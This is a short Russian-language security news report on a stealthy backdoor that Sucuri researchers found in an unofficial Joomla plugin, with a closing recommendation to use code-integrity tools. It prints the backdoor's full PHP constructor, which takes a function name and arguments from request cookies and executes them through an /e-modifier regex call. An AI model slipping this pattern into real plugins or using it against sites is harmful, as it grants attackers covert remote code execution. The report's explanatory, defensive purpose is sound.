По данным экспертов, упустить наличие бреши могут как администраторы, так и решения безопасности.
Как сообщают исследователи безопасности в официальном блоге компании Sucuri, им удалось выявить «интересный бэкдор» в неофициальном плагине для платформы Joomla.
По словам специалистов, все было настолько хорошо продумано, что поначалу они не смогли понять, что имеют дело с бэкдором. Для наглядности эксперты предоставили код упомянутого дополнения:
«На первый взгляд ничего подозрительного. Ничего не зашифровано, не запутано и нет излишних комментариев. Самый обычный код для плагина Joomla, - отмечают в Sucuri. – Однако если вы посмотрите немного внимательней, то заметите, что конструктор класса не так уж и безобиден».
public function __construct() { $filter = JRequest::getString('p3', Null, 'cookie'); if ($filter) { $option = $filter(JRequest::getString('p2', Null, 'cookie')); $auth = $filter(JRequest::getString('p1', Null, 'cookie')); $option("/123/e",$auth,123); die(); } }
Исследователи подчеркивают, что не заметить уязвимость при просмотре кода довольно легко. Более того, упустить ее могут и многие сканеры безопасности, однако надежным методом противостояния подобным угрозам является использование инструментов по контролю целостности кода.
Ознакомиться с отчетом можно здесь .
Но доступ к знаниям открыт для всех